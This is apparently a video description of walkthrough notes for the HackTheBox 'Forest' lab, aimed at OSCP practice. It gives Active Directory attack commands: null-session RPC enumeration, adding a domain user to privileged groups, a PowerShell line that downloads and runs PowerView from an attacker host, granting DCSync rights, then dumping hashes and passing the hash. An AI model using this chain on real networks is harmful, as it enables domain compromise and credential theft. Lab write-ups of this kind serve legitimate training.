Скачать или смотреть Cyber Security | Ethical Hacking | Pentesting Lab | Hackthebox | Forest | OSCP

1. Very good Windows machine for OSCP like preparations.
2. Active directory environment.
3. Run rpc enumeration:
rpcclient -U '' -N 10.10.10.1
enumdomusers
4. Bloodhound to visualize active directory environments. Need to use collecor which should be running on top of target to collect data.
5. DCSync attack:
1) Create a user on the domain. becase current user is a member of the group *Account Operators
net user bob abc123! /add /domain
2) Add the user to the Exchange Windows Permission group. This is possible because svc-alfresco has GenericAll permissions on the Exchange Windows Permissions group
net group "Exchange Windows Permissions" bob /add
net localgroup "Remote Management Users" bob /add

3) Use powerview to add objectACL:
(New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/PowerView.ps1') | IEX
$SecPass=ConvertTo-SecureString 'abc123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\frank', $SecPass)
Add-ObjectACL -PrincipalIdentity bob -Credential $Cred -Rights DCSync

4) secretsdump Impacket script

5)Use the psexec Impacket script to perform a pass the hash attack with the Administrator’s hash.